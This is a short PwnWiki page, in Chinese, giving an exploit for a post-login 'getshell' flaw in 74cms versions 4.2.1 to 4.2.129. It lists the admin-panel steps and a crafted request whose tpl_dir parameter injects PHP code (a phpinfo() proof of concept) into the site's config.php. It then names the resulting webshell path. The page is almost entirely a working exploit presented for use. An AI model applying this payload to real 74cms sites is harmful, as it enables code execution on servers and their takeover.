74cms v4.2.1-v4.2.129 後台getshell漏洞

From PwnWiki
Revision as of 14:40, 5 May 2021 by Pwnwiki (talk | contribs) (Created page with "==漏洞利用== 管理面板-風格模板-工具-點擊可用模板抓包 <pre> url: http://74cms.test/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),' webshell:ht...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

漏洞利用

管理面板-風格模板-工具-點擊可用模板抓包 

url: http://74cms.test/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),'

webshell:http://74cms.test/Application/Home/Conf/config.php


\74cms\upload\Application\Home\Conf\config.php
Retrieved from "https://pwnwiki.com/index.php?title=74cms_v4.2.1-v4.2.129_後台getshell漏洞&oldid=2468"